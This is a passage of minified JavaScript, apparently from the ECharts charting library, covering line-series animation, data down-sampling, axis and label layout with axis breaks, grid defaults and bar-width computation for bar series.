z=d[m],E=2*m,V=2*z;L[E]=l[V],L[E+1]=l[V+1],O[E]=u[V],O[E+1]=u[V+1],R[E]=c[V],R[E+1]=c[V+1],N[E]=h[V],N[E+1]=h[V+1],B[m]=p[z]}return{current:L,next:O,stackedOnCurrent:R,stackedOnNext:N,status:B}}(this._data,t,this._stackedOnPoints,e,this._coordSys,0,this._valueOrigin),h=c.current,p=c.stackedOnCurrent,d=c.next,f=c.stackedOnNext;if(r&&(p=ek(c.stackedOnCurrent,c.current,n,r,a),h=ek(c.current,null,n,r,a),f=ek(c.stackedOnNext,c.next,n,r,a),d=ek(c.next,null,n,r,a)),JT(h,d)>3e3||l&&JT(p,f)>3e3)return s.stopAnimation(),s.setShape({points:d}),void(l&&(l.stopAnimation(),l.setShape({points:d,stackedOnPoints:f})));s.shape.__points=c.current,s.shape.points=h;var g={shape:{points:d}};c.current!==h&&(g.shape.__points=c.next),s.stopAnimation(),Bh(s,g,u),l&&(l.setShape({points:h,stackedOnPoints:p}),l.stopAnimation(),Bh(l,{shape:{stackedOnPoints:f}},u),s.shape.points!==l.shape.points&&(l.shape.points=s.shape.points));for(var v=[],y=c.status,m=0;m<y.length;m++){if("="===y[m].cmd){var _=t.getItemGraphicEl(y[m].idx1);_&&v.push({el:_,ptIdx:m})}}s.animators&&s.animators.length&&s.animators[0].during(function(){l&&l.dirtyShape();for(var t=s.shape.__points,e=0;e<v.length;e++){var n=v[e].el,i=2*v[e].ptIdx;n.x=t[i],n.y=t[i+1],n.markRedraw()}})},e.prototype.remove=function(t){var e=this.group,n=this._data;this._lineGroup.removeAll(),this._symbolDraw.remove(!0),n&&n.eachItemGraphicEl(function(t,i){t.__temp&&(e.remove(t),n.setItemGraphicEl(i,null))}),this._polyline=this._polygon=this._coordSys=this._points=this._stackedOnPoints=this._endLabel=this._data=null},e.type="line",e}(cy);function lk(t,e){return{seriesType:t,plan:sy(),reset:function(t){var n=t.getData(),i=t.coordinateSystem,r=t.pipelineContext,o=e||r.large;if(i){var a=V(i.dimensions,function(t){return n.mapDimension(t)}).slice(0,2),s=a.length,l=n.getCalculationInfo("stackResultDimension");Jx(n,a[0])&&(a[0]=l),Jx(n,a[1])&&(a[1]=l);var u=n.getStore(),c=n.getDimensionIndex(a[0]),h=n.getDimensionIndex(a[1]);return s&&{progress:function(t,e){for(var n=t.end-t.start,r=o&&zT(n*s),a=[],l=[],p=t.start,d=0;p<t.end;p++){var f=void 0;if(1===s){var g=u.get(c,p);f=i.dataToPoint(g,null,l)}else a[0]=u.get(c,p),a[1]=u.get(h,p),f=i.dataToPoint(a,null,l);o?(r[d++]=f[0],r[d++]=f[1]):e.setItemLayout(p,f.slice())}o&&(e.setLayout("points",r),e.setLayout("pointsRange",{start:t.start,end:t.end}))}}}}}}var uk={average:function(t){for(var e=0,n=0,i=0;i<t.length;i++)isNaN(t[i])||(e+=t[i],n++);return 0===n?NaN:e/n},sum:function(t){for(var e=0,n=0;n<t.length;n++)e+=t[n]||0;return e},max:function(t){for(var e=-1/0,n=0;n<t.length;n++)t[n]>e&&(e=t[n]);return isFinite(e)?e:NaN},min:function(t){for(var e=1/0,n=0;n<t.length;n++)t[n]<e&&(e=t[n]);return isFinite(e)?e:NaN},nearest:function(t){return t[0]}},ck=function(t){return Math.round(t.length/2)};function hk(t){return{seriesType:t,reset:function(t,e,n){var i=t.getData(),r=t.get("sampling"),o=t.coordinateSystem,a=i.count();if(a>10&&"cartesian2d"===o.type&&r){var s=o.getBaseAxis(),l=o.getOtherAxis(s),u=s.getExtent(),c=n.getDevicePixelRatio(),h=Math.abs(u[1]-u[0])*(c||1),p=Math.round(a/h);if(isFinite(p)&&p>1){"lttb"===r?t.setData(i.lttbDownSample(i.mapDimension(l.dim),1/p)):"minmax"===r&&t.setData(i.minmaxDownSample(i.mapDimension(l.dim),1/p));var d=void 0;j(r)?d=uk[r]:X(r)&&(d=r),d&&t.setData(i.downSample(i.mapDimension(l.dim),1/p,d,ck))}}}}}var pk=function(t){function e(e,n,i,r,o){var a=t.call(this,e,n,i)||this;return a.index=0,a.type=r||"value",a.position=o||"bottom",a}return n(e,t),e.prototype.isHorizontal=function(){var t=this.position;return"top"===t||"bottom"===t},e.prototype.getGlobalExtent=function(t){var e=this.getExtent();return e[0]=this.toGlobalCoord(e[0]),e[1]=this.toGlobalCoord(e[1]),t&&e[0]>e[1]&&e.reverse(),e},e.prototype.pointToData=function(t,e){return this.coordToData(this.toLocalCoord(t["x"===this.dim?0:1]),e)},e.prototype.setCategorySortInfo=function(t){if("category"!==this.type)return!1;this.model.option.categorySortInfo=t,this.scale.setSortInfo(t)},e}(wS),dk=null;function fk(){return dk}var gk="expandAxisBreak",vk="collapseAxisBreak",yk="toggleAxisBreak",mk="axisbreakchanged",_k={type:gk,event:mk,update:"update",refineEvent:wk},xk={type:vk,event:mk,update:"update",refineEvent:wk},bk={type:yk,event:mk,update:"update",refineEvent:wk};function wk(t,e,n,i){var r=[];return E(t,function(t){r=r.concat(t.eventBreaks)}),{eventContent:{breaks:r}}}var Sk=Math.PI,Mk=[[1,2,1,2],[5,3,5,3],[8,3,8,3]],Tk=[[0,1,0,1],[0,3,0,3],[0,3,0,3]],kk=Ta(),Ck=Ta(),Ik=function(){function t(t){this.recordMap={},this.resolveAxisNameOverlap=t}return t.prototype.ensureRecord=function(t){var e=t.axis.dim,n=t.componentIndex,i=this.recordMap,r=i[e]||(i[e]=[]);return r[n]||(r[n]={ready:{}})},t}();var Dk=[1,0,0,1,0,0],Ak=new Ue(0,0,0,0),Pk=function(t,e,n,i,r,o){if(tw(t.nameLocation)){var a=o.stOccupiedRect;a&&Lk(function(t,e,n){return t.transform=Sp(t.transform,n),t.localRect=wp(t.localRect,e),t.rect=wp(t.rect,e),n&&t.rect.applyTransform(n),t.axisAligned=xp(n),t.obb=void 0,(t.label=t.label||{}).ignore=!1,t}({},a,o.transGroup.transform),i,r)}else Ok(o.labelInfoList,o.dirVec,i,r)};function Lk(t,e,n){var i=new Ae;ZS(t,e,i,{direction:Math.atan2(n.y,n.x),bidirectional:!1,touchThreshold:.05})&&GS(e,i)}function Ok(t,e,n,i){for(var r=Ae.dot(i,e)>=0,o=0,a=t.length;o<a;o++){var s=t[r?o:a-1-o];s.label.ignore||Lk(s,n,i)}}var Rk=function(){function t(t,e,n,i){this.group=new ho,this._axisModel=t,this._api=e,this._local={},this._shared=i||new Ik(Pk),this._resetCfgDetermined(n)}return t.prototype.updateCfg=function(t){var e=this._cfg.raw;e.position=t.position,e.labelOffset=t.labelOffset,this._resetCfgDetermined(e)},t.prototype.__getRawCfg=function(){return this._cfg.raw},t.prototype._resetCfgDetermined=function(t){var e=this._axisModel,n=e.getDefaultOption?e.getDefaultOption():{},i=at(t.axisName,e.get("name")),r=e.get("nameMoveOverlap");null!=r&&"auto"!==r||(r=at(t.defaultNameMoveOverlap,!0));var o={raw:t,position:t.position,rotation:t.rotation,nameDirection:at(t.nameDirection,1),tickDirection:at(t.tickDirection,1),labelDirection:at(t.labelDirection,1),labelOffset:at(t.labelOffset,0),silent:at(t.silent,!0),axisName:i,nameLocation:st(e.get("nameLocation"),n.nameLocation,"end"),shouldNameMoveOverlap:Zk(i)&&r,optionHideOverlap:e.get(["axisLabel","hideOverlap"]),showMinorTicks:e.get(["minorTick","show"])};this._cfg=o;var a=new ho({x:o.position[0],y:o.position[1],rotation:o.rotation});a.updateTransform(),this._transformGroup=a;var s=this._shared.ensureRecord(e);s.transGroup=this._transformGroup,s.dirVec=new Ae(Math.cos(-o.rotation),Math.sin(-o.rotation))},t.prototype.build=function(t,e){var n=this;return t||(t={axisLine:!0,axisTickLabelEstimate:!1,axisTickLabelDetermine:!0,axisName:!0}),E(Nk,function(i){t[i]&&Bk[i](n._cfg,n._local,n._shared,n._axisModel,n.group,n._transformGroup,n._api,e||{})}),this},t.innerTextLayout=function(t,e,n){var i,r,o=Zo(e-t);return Yo(o)?(r=n>0?"top":"bottom",i="center"):Yo(o-Sk)?(r=n>0?"bottom":"top",i="center"):(r="middle",i=o>0&&o<Sk?n>0?"right":"left":n>0?"left":"right"),{rotation:o,textAlign:i,textVerticalAlign:r}},t.makeAxisEventDataBase=function(t){var e={componentType:t.mainType,componentIndex:t.componentIndex};return e[t.mainType+"Index"]=t.componentIndex,e},t.isLabelSilent=function(t){var e=t.get("tooltip");return t.get("silent")||!(t.get("triggerEvent")||e&&e.show)},t}(),Nk=["axisLine","axisTickLabelEstimate","axisTickLabelDetermine","axisName"],Bk={axisLine:function(t,e,n,i,r,o,a){var s=i.get(["axisLine","show"]);if("auto"===s&&(s=!0,null!=t.raw.axisLineAutoShow&&(s=!!t.raw.axisLineAutoShow)),s){var l=i.axis.getExtent(),u=o.transform,c=[l[0],0],h=[l[1],0],p=c[0]>h[0];u&&(Ut(c,c,u),Ut(h,h,u));var d=A({lineCap:"round"},i.getModel(["axisLine","lineStyle"]).getLineStyle()),f={strokeContainThreshold:t.raw.strokeContainThreshold||5,silent:!0,z2:1,style:d};if(i.get(["axisLine","breakLine"])&&gd(i.axis.scale))fk().buildAxisBreakLine(i,r,o,f);else{var g=new hh(A({shape:{x1:c[0],y1:c[1],x2:h[0],y2:h[1]}},f));np(g.shape,g.style.lineWidth),g.anid="line",r.add(g)}var v=i.get(["axisLine","symbol"]);if(null!=v){var y=i.get(["axisLine","symbolSize"]);j(v)&&(v=[v,v]),(j(y)||K(y))&&(y=[y,y]);var m=km(i.get(["axisLine","symbolOffset"])||0,y),_=y[0],x=y[1];E([{rotate:t.rotation+Math.PI/2,offset:m[0],r:0},{rotate:t.rotation-Math.PI/2,offset:m[1],r:Math.sqrt((c[0]-h[0])*(c[0]-h[0])+(c[1]-h[1])*(c[1]-h[1]))}],function(e,n){if("none"!==v[n]&&null!=v[n]){var i=Mm(v[n],-_/2,-x/2,_,x,d.stroke,!0),o=e.r+e.offset,a=p?h:c;i.attr({rotation:e.rotate,x:a[0]+o*Math.cos(t.rotation),y:a[1]-o*Math.sin(t.rotation),silent:!0,z2:11}),r.add(i)}})}}},axisTickLabelEstimate:function(t,e,n,i,r,o,a,s){Fk(e,r,s)&&zk(t,e,n,i,r,o,a,oS)},axisTickLabelDetermine:function(t,e,n,i,r,o,a,s){Fk(e,r,s)&&zk(t,e,n,i,r,o,a,aS);var l=function(t,e,n,i){var r=i.axis,o=i.getModel("axisTick"),a=o.get("show");"auto"===a&&(a=!0,null!=t.raw.axisTickAutoShow&&(a=!!t.raw.axisTickAutoShow));if(!a||r.scale.isBlank())return[];for(var s=o.getModel("lineStyle"),l=t.tickDirection*o.get("length"),u=Vk(r.getTicksCoords(),n.transform,l,L(s.getLineStyle(),{stroke:i.get(["axisLine","lineStyle","color"])}),"ticks"),c=0;c<u.length;c++)e.add(u[c]);return u}(t,r,o,i);!function(t,e,n){if(t.showMinorTicks)return;E(e,function(t){if(t&&t.label.ignore)for(var e=0;e<n.length;e++){var i=n[e],r=Ck(i),o=kk(t.label);if(null!=r.tickValue&&!r.onBand&&r.tickValue===o.labelInfo.tick.value)return void Ek(i)}})}(t,e.labelLayoutList,l),function(t,e,n,i,r){var o=i.axis,a=i.getModel("minorTick");if(!t.showMinorTicks||o.scale.isBlank())return;var s=o.getMinorTicksCoords();if(!s.length)return;for(var l=a.getModel("lineStyle"),u=r*a.get("length"),c=L(l.getLineStyle(),L(i.getModel("axisTick").getLineStyle(),{stroke:i.get(["axisLine","lineStyle","color"])})),h=0;h<s.length;h++)for(var p=Vk(s[h],n.transform,u,c,"minorticks_"+h),d=0;d<p.length;d++)e.add(p[d])}(t,r,o,i,t.tickDirection)},axisName:function(t,e,n,i,r,o,a,s){var l=n.ensureRecord(i);e.nameEl&&(r.remove(e.nameEl),e.nameEl=l.nameLayout=l.nameLocation=null);var u=t.axisName;if(Zk(u)){var c=t.nameLocation,h=t.nameDirection,p=i.getModel("nameTextStyle"),d=i.get("nameGap")||0,f=i.axis.getExtent(),g=i.axis.inverse?-1:1,v=new Ae(0,0),y=new Ae(0,0);"start"===c?(v.x=f[0]-g*d,y.x=-g):"end"===c?(v.x=f[1]+g*d,y.x=g):(v.x=(f[0]+f[1])/2,v.y=t.labelOffset+h*d,y.y=h);var m=[1,0,0,1,0,0];y.transform(ke(m,m,t.rotation));var _,x,b=i.get("nameRotate");null!=b&&(b=b*Sk/180),tw(c)?_=Rk.innerTextLayout(t.rotation,null!=b?b:t.rotation,h):(_=function(t,e,n,i){var r,o,a=Zo(n-t),s=i[0]>i[1],l="start"===e&&!s||"start"!==e&&s;Yo(a-Sk/2)?(o=l?"bottom":"top",r="center"):Yo(a-1.5*Sk)?(o=l?"top":"bottom",r="center"):(o="middle",r=a<1.5*Sk&&a>Sk/2?l?"left":"right":l?"right":"left");return{rotation:a,textAlign:r,textVerticalAlign:o}}(t.rotation,c,b||0,f),null!=(x=t.raw.axisNameAvailableWidth)&&(x=Math.abs(x/Math.sin(_.rotation)),!isFinite(x)&&(x=null)));var w=p.getFont(),S=i.get("nameTruncate",!0)||{},M=S.ellipsis,T=ot(t.raw.nameTruncateMaxWidth,S.maxWidth,x),k=s.nameMarginLevel||0,C=new Ql({x:v.x,y:v.y,rotation:_.rotation,silent:Rk.isLabelSilent(i),style:Op(p,{text:u,font:w,overflow:"truncate",width:T,ellipsis:M,fill:p.getTextColor()||i.get(["axisLine","lineStyle","color"]),align:p.get("align")||_.textAlign,verticalAlign:p.get("verticalAlign")||_.textVerticalAlign}),z2:1});if(yp({el:C,componentModel:i,itemName:u}),C.__fullText=u,C.anid="name",i.get("triggerEvent")){var I=Rk.makeAxisEventDataBase(i);I.targetType="axisName",I.name=u,hu(C).eventData=I}o.add(C),C.updateTransform(),e.nameEl=C;var D=l.nameLayout=VS({label:C,priority:C.z2,defaultAttr:{ignore:C.ignore},marginDefault:tw(c)?Mk[k]:Tk[k]});if(l.nameLocation=c,r.add(C),C.decomposeTransform(),t.shouldNameMoveOverlap&&D){var A=n.ensureRecord(i);0,n.resolveAxisNameOverlap(t,n,i,D,y,A)}}}};function zk(t,e,n,i,r,o,a,s){Hk(e)||function(t,e,n,i,r,o){var a=r.axis,s=ot(t.raw.axisLabelShow,r.get(["axisLabel","show"])),l=new ho;n.add(l);var u=sS(i);if(!s||a.scale.isBlank())return void Gk(e,[],l,u);var c=r.getModel("axisLabel"),h=a.getViewLabels(u),p=(ot(t.raw.labelRotate,c.get("rotate"))||0)*Sk/180,d=Rk.innerTextLayout(t.rotation,p,t.labelDirection),f=r.getCategories&&r.getCategories(!0),g=[],v=r.get("triggerEvent"),y=1/0,m=-1/0;E(h,function(t,e){var n,i=t.tick,s=t.formattedLabel,u=t.rawLabel,p=c,_=rw(a.scale,i);if(f&&f[_]){var x=f[_];$(x)&&x.textStyle&&(p=new td(x.textStyle,c,r.ecModel))}var b=p.getTextColor()||r.get(["axisLine","lineStyle","color"]),w=p.getShallow("align",!0)||d.textAlign,S=at(p.getShallow("alignMinLabel",!0),w),M=at(p.getShallow("alignMaxLabel",!0),w),T=p.getShallow("verticalAlign",!0)||p.getShallow("baseline",!0)||d.textVerticalAlign,k=at(p.getShallow("verticalAlignMinLabel",!0),T),C=at(p.getShallow("verticalAlignMaxLabel",!0),T),I=10+((null===(n=i.time)||void 0===n?void 0:n.level)||0);y=Math.min(y,I),m=Math.max(m,I);var D=new Ql({x:0,y:0,rotation:0,silent:Rk.isLabelSilent(r),z2:I,style:Op(p,{text:s,align:0===e?S:e===h.length-1?M:w,verticalAlign:0===e?k:e===h.length-1?C:T,fill:X(b)?b("category"===a.type?u:"value"===a.type?_+"":_,e):b})});D.anid="label_"+_;var A=kk(D);if(A.labelInfo=t,A.layoutRotation=d.rotation,yp({el:D,componentModel:r,itemName:s,formatterParamsExtra:{isTruncated:function(){return D.isTruncated},value:u,tickIndex:e}}),v){var P=Rk.makeAxisEventDataBase(r);P.targetType="axisLabel",P.value=u,P.tickIndex=e;var L=t.tick.break;if(L){var O=L.parsedBreak;P.break={start:O.vmin,end:O.vmax}}"category"===a.type&&(P.dataIndex=_),hu(D).eventData=P,L&&function(t,e,n,i){n.on("click",function(n){var r={type:gk,breaks:[{start:i.parsedBreak.breakOption.start,end:i.parsedBreak.breakOption.end}]};r[t.axis.dim+"AxisIndex"]=t.componentIndex,e.dispatchAction(r)})}(r,o,D,L)}g.push(D),l.add(D)});var _=V(g,function(t){return{label:t,priority:kk(t).labelInfo.tick.break?t.z2+(m-y+1):t.z2,defaultAttr:{ignore:t.ignore}}});Gk(e,_,l,u)}(t,e,r,s,i,a);var l=e.labelLayoutList;!function(t,e,n,i){var r=e.get(["axisLabel","margin"]);E(n,function(n,o){var a=VS(n);if(a){var s=a.label,l=kk(s);a.suggestIgnore=s.ignore,s.ignore=!1,Er(Wk,Uk);var u=e.axis;Wk.x=u.dataToCoord(rw(u.scale,l.labelInfo.tick)),Wk.y=t.labelOffset+t.labelDirection*r,Wk.rotation=l.layoutRotation,i.add(Wk),Wk.updateTransform(),i.remove(Wk),Wk.decomposeTransform(),Er(s,Wk),s.markRedraw(),zS(a,!0),VS(a)}})}(t,i,l,o),function(t,e,n){var i=pd();if(!i)return;var r=i.retrieveAxisBreakPairs(n,function(t){return t&&kk(t.label).labelInfo.tick.break},!0),o=t.get(["breakLabelLayout","moveOverlap"],!0);!0!==o&&"auto"!==o||E(r,function(i){fk().adjustBreakLabelPair(t.axis.inverse,e,[VS(n[i[0]]),VS(n[i[1]])])})}(i,t.rotation,l);var u=t.optionHideOverlap;!function(t,e,n){var i=t.axis,r=t.get(["axisLabel","customValues"]);if(function(t){return"category"===t.type&&0===Jb(t.getLabelModel())}(i))return;function o(t,o,a){var s=VS(e[o]),l=VS(e[a]),u=i.scale;if(s&&l){if(null==t){if(!n&&r)return;var c=kk(s.label).labelInfo.tick;if(mb(u)&&c.notNice||xb(u)&&c.offInterval)return void Ek(s.label)}if(!1===t||s.suggestIgnore)Ek(s.label);else if(l.suggestIgnore)Ek(l.label);else{var h=.1;if(!n){var p=[0,0,0,0];s=WS({marginForce:p},s),l=WS({marginForce:p},l)}ZS(s,l,null,{touchThreshold:h})&&Ek(t?l.label:s.label)}}}var a=t.get(["axisLabel","showMinLabel"]),s=t.get(["axisLabel","showMaxLabel"]),l=e.length;o(a,0,1),o(s,l-1,l-2)}(i,l,u),u&&function(t){var e=[];function n(t){if(!t.ignore){var e=t.ensureState("emphasis");null==e.ignore&&(e.ignore=!1)}t.ignore=!0}t.sort(function(t,e){return(e.suggestIgnore?1:0)-(t.suggestIgnore?1:0)||e.priority-t.priority});for(var i=0;i<t.length;i++){var r=VS(t[i]);if(!r.label.ignore){for(var o=r.label,a=r.labelLine,s=!1,l=0;l<e.length;l++)if(ZS(r,e[l],null,{touchThreshold:.05})){s=!0;break}s?(n(o),a&&n(a)):e.push(r)}}}(H(l,function(t){return t&&!t.label.ignore})),function(t,e,n,i){var r,o=n.axis,a=e.ensureRecord(n),s=[],l=Zk(t.axisName)&&tw(t.nameLocation);E(i,function(t){var e=VS(t);if(e&&!e.label.ignore){s.push(e);var n=a.transGroup;l&&(n.transform?Ie(Dk,n.transform):we(Dk),e.transform&&Me(Dk,Dk,e.transform),Ue.copy(Ak,e.localRect),Ak.applyTransform(Dk),r?r.union(Ak):Ue.copy(r=new Ue(0,0,0,0),Ak))}});var u=Math.abs(a.dirVec.x)>.1?"x":"y",c=a.transGroup[u];if(s.sort(function(t,e){return Math.abs(t.label[u]-c)-Math.abs(e.label[u]-c)}),l&&r){var h=o.getExtent(),p=Math.min(h[0],h[1]),d=Math.max(h[0],h[1])-p;r.union(new Ue(p,0,d,1))}a.stOccupiedRect=r,a.labelInfoList=s}(t,n,i,l)}function Ek(t){t&&(t.ignore=!0)}function Vk(t,e,n,i,r){for(var o=[],a=[],s=[],l=0;l<t.length;l++){var u=t[l].coord;a[0]=u,a[1]=0,s[0]=u,s[1]=n,e&&(Ut(a,a,e),Ut(s,s,e));var c=new hh({shape:{x1:a[0],y1:a[1],x2:s[0],y2:s[1]},style:i,z2:2,autoBatch:!0,silent:!0});np(c.shape,c.style.lineWidth),c.anid=r+"_"+t[l].tickValue,o.push(c);var h=Ck(c);h.onBand=!!t[l].onBand,h.tickValue=t[l].tickValue}return o}function Fk(t,e,n){if(Hk(t)){var i=t.axisLabelsCreationContext;0;var r=i.out.noPxChangeTryDetermine;if(n.noPxChange){for(var o=!0,a=0;a<r.length;a++)o=o&&r[a]();if(o)return!1}r.length&&(e.remove(t.labelGroup),Gk(t,null,null,null))}return!0}function Hk(t){return!!t.labelLayoutList}function Gk(t,e,n,i){t.labelLayoutList=e,t.labelGroup=n,t.axisLabelsCreationContext=i}var Wk=new jl,Uk=new jl;function Zk(t){return!!t}function Yk(t,e,n){n=n||{};var i=e.axis,r={},o=i.getAxesOnZeroOf()[0],a=i.position,s=o?"onZero":a,l=i.dim,u=[t.x,t.x+t.width,t.y,t.y+t.height],c={left:0,right:1,top:0,bottom:1,onZero:2},h=e.get("offset")||0,p="x"===l?[u[2]-h,u[3]+h]:[u[0]-h,u[1]+h];if(o){var d=o.toGlobalCoord(o.dataToCoord(0));p[c.onZero]=Math.max(Math.min(d,p[1]),p[0])}r.position=["y"===l?p[c[s]]:u[0],"x"===l?p[c[s]]:u[3]],r.rotation=Math.PI/2*("x"===l?0:1);r.labelDirection=r.tickDirection=r.nameDirection={top:-1,bottom:1,left:-1,right:1}[a],r.labelOffset=o?p[c[a]]-p[c.onZero]:0,e.get(["axisTick","inside"])&&(r.tickDirection=-r.tickDirection),ot(n.labelInside,e.get(["axisLabel","inside"]))&&(r.labelDirection=-r.labelDirection);var f=e.get(["axisLabel","rotate"]);return r.labelRotate="top"===s?-f:f,r.z2=1,r}function Xk(){var t;t=jk,_w["liPosMinGap"]=t}function jk(t,e,n){var i,r=mt(),o=n.serUids,a=n.liPosMinGap,s=e.axis,l=s.scale,u=l.needTransform(),c=l.getFilter?l.getFilter():null,h=cv(c);function p(n){vw(t,e.sers,function(t){var e=t.getRawData(),i=e.getDimensionIndex(e.mapDimension(s.dim));i>=0&&n(i,t,e.getStore())})}var d=0;if(p(function(t,e,n){r.set(e.uid,1),o&&o.hasKey(e.uid)||(i=!0),d+=n.count()}),o&&o.keys().length===r.keys().length||(i=!0),i||null==a){ET(qk,d);var f=0;p(function(t,e,n){for(var i=0,r=n.count();i<r;++i){var o=n.get(t,i);!isFinite(o)||c&&!hv(h,o)||(u&&(o=l.transformIn(o,null)),qk.arr[f++]=o)}});var g=qk.typed?qk.arr.subarray(0,f):(qk.arr.length=f,qk.arr);qk.typed?g.sort():Eo(g);for(var v=1/0,y=1;y<f;++y){var m=g[y]-g[y-1];m>0&&m<v&&(v=m)}n.liPosMinGap=e.liPosMinGap=ia(v)?v:f>0?-2:-1,n.serUids=r}else e.liPosMinGap=a}var qk=ET({ctor:BT},50);function Kk(t,e){return t+lw+e}function $k(t){return Xk(),{liPosMinGap:!xb(t.scale)}}var Qk="bar";function Jk(t,e,n,i){!function(t,e){var n=bw(e.seriesType,e.baseAxis,e.coordSysType);ww.set(n,e),sw(t,function(){t.registerProcessor(t.PRIORITY.PROCESSOR.AXIS_STATISTICS,{overallReset:mw})})}(t,{key:e,seriesType:n,coordSysType:i,getMetrics:$k})}var tC={left:0,right:0,top:0,bottom:0},eC=["25%","25%"],nC="cartesian2d",iC=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return n(e,t),e.prototype.mergeDefaultAndTheme=function(e,n){var i=Sf(e.outerBounds);t.prototype.mergeDefaultAndTheme.apply(this,arguments),i&&e.outerBounds&&wf(e.outerBounds,i)},e.prototype.mergeOption=function(e,n){t.prototype.mergeOption.apply(this,arguments),this.option.outerBounds&&e.outerBounds&&wf(this.option.outerBounds,e.outerBounds)},e.type="grid",e.dependencies=["xAxis","yAxis"],e.layoutMode="box",e.defaultOption={show:!1,z:0,left:"15%",top:65,right:"10%",bottom:80,containLabel:!1,outerBoundsMode:"auto",outerBounds:tC,outerBoundsContain:"all",outerBoundsClampWidth:eC[0],outerBoundsClampHeight:eC[1],backgroundColor:Cf.color.transparent,borderWidth:1,borderColor:Cf.color.neutral30},e}(kf),rC=Fa();function oC(t){return t.get("stack")||"__ec_stack_"+t.seriesIndex}function aC(t,e){var n=function(t,e){var n=Kk(e,nC),i=[],r=xS(t,{fromStat:{key:n},min:1});return gw(t,n,function(t){i.push({barWidth:No(t.get("barWidth"),r.w),barMaxWidth:No(t.get("barMaxWidth"),r.w),barMinWidth:No(t.get("barMinWidth")||(lC(t)?.5:1),r.w),barGap:t.get("barGap"),barCategoryGap:t.get("barCategoryGap"),defaultBarGap:t.get("defaultBarGap"),stackId:oC(t)})}),{bandWidthResult:r,seriesInfo:i}}(t,e);return n.columnMap=function(t){var e,n,i=t.bandWidthResult.w,r=i,o=0,a=[],s={};E(t.seriesInfo,function(t,i){i||(n=t.defaultBarGap||0);var l=t.stackId;wt(s,l)||o++;var u=s[l];u||(u=s[l]={width:0,maxWidth:0},a.push(l));var c=t.barWidth;c&&!u.width&&(u.width=c,c=So(r,c),r-=c);var h=t.barMaxWidth;h&&(u.maxWidth=h);var p=t.barMinWidth;p&&(u.minWidth=p);var d=t.barGap;null!=d&&(n=d);var f=t.barCategoryGap;null!=f&&(e=f)}),null==e&&(e=Mo(35-4*a.length,15)+"%");var l=No(e,i),u=No(n,1),c=(r-l)/(o+(o-1)*u);c=Mo(c,0),E(a,function(t){var e=s[t],n=e.maxWidth,i=e.minWidth;if(e.width){a=e.width;n&&(a=So(a,n)),i&&(a=Mo(a,i)),e.width=a,r-=a+u*a,o--}else{var a=c;n&&n<a&&(a=So(n,r)),i&&i>a&&(a=i),a!==c&&(e.width=a,r-=a+u*a,o--)}}),c=Mo(c=(r-l)/(o+(o-1)*u),0);var h,p=0;E(a,function(t){var e=s[t];e.width||(e.width=c),h=e,p+=e.width*(1+u)}),h&&(p-=h.width*u);var d={},f=-p/2;return E(a,function(t){var e=s[t];d[t]=d[t]||{bandWidth:i,offset:f,width:e.width},f+=e.width*(1+u)}),d}(n),n}function sC(t){return{seriesType:t,overallReset:function(e){var n=Kk(t,nC);!function(t,e,n){var i=uw(pm(t)).keyed,r=i&&i.get(e);r&&r.each(function(t){n(t.axis)})}(e,n,function(e){var i=aC(e,t);gw(e,n,function(t){var e=i.columnMap[oC(t)];t.getData().setLayout({bandWidth:e.bandWidth,offset:e.offset,size:e.width})})})}}}function lC(t){return t.pipelineContext&&t.pipelineContext.large}function uC(t){return e=Kk(t,nC),function(t,n){var i=xS(t,{fromStat:{key:e}});if(ia(i.w2))return[-i.w2/2,i.w2/2]};var e}function cC(t){rC(t,function(){function e(e){var n=Kk(e,nC);Jk(t,n,e,nC),function(t,e){Pw.set(t,e)}(n,uC(e))}e("bar"),e("pictorialBar")})}var hC=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.prototype.getInitialData=function(t,e){return eb(null,this,{useEncodeDefaulter:!0})},e.prototype.getMarkerPosition=function(t,e,n){var i=this.coordinateSystem;if(i&&i.clampData){var r=i.clampData(t),o=i.dataToPoint(r);if(n)E(i.getAxes(),function(t,n){if("category"===t.type&&null!=e){var i=t.getTicksCoords(),a=t.getTickModel().get("alignWithLabel"),s=r[n],l="x1"===e[n]||"y1"===e[n];if(l&&!a&&(s+=1),i.length<2)return;if(2===i.length)return void(o[n]=t.toGlobalCoord(t.getExtent()[l?1:0]));for(var u=void 0,c=void 0,h=1,p=0;p<i.length;p++){var d=i[p].coord,f=p===i.length-1?i[p-1].tickValue+h:i[p].tickValue;if(f===s){c=d;break}if(f<s)u=d;else if(null!=u&&f>s){c=(d+u)/2;break}1===p&&(h=f-i[0].tickValue)}null==c&&(u?u&&(c=i[i.length-1].coord):c=i[0].coord),o[n]=t.toGlobalCoord(c)}});else{var a=this.getData(),s=a.getLayout("offset"),l=a.getLayout("size"),u=i.getBaseAxis().isHorizontal()?0:1;o[u]+=s+l/2}return o}return[NaN,NaN]},e.prototype.__requireStartValue=function(t){return this.getBaseAxis()!==t},e.type="series.__base_bar__",e.defaultOption={z:2,coordinateSystem:"cartesian2d",legendHoverLink:!0,barMinHeight:0,barMinAngle:0,large:!1,largeThreshold:400,progressive:3e3,progressiveChunkMode:"mod",defaultBarGap:"10%"},e}(Qv);Qv.registerClass(hC);var pC=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.prototype.getInitialData=function(){return eb(null,this,{useEncodeDefaulter:!0,createInvertedIndices:!!this.get("realtimeSort",!0)||null})},e.prototype.getProgressive=function(){return!!this.get("large")&&this.get("progressive")},e.prototype.__preparePipelineContext=function(t,e){var n=Ya(this,t,e);return n.progressiveRender&&(n.large=!0),n},e.prototype.brushSelector=function(t,e,n){return n.rect(e.getItemLayout(t))},e.type="series."+Qk,e.dependencies=["grid","polar"],e.defaultOption=id(hC.defaultOption,{clip:!0,roundCap:!1,showBackground:!1,backgroundStyle:{color:"rgba(180, 180, 180, 0.2)",borderColor:null,borderWidth:0,borderType:"solid",borderRadius:0,shadowBlur:0,shadowColor:null,shadowOffsetX:0,shadowOffsetY:0,opacity:1},select:{itemStyle:{borderColor:Cf.color.primary,borderWidth:2}},realtimeSort:!1}),e}(hC),dC=function(){this.cx=0,this.cy=0,this.r0=0,this.r=0,this.startAngle=0,this.endAngle=2*Math.PI,this.clockwise=!0},fC=function(t){function e(e){var n=t.call(this,e)||this;return n.type="sausage",n}return n(e,t),e.prototype.getDefaultShape=function(){return new dC},e.prototype.buildPath=function(t,e){var 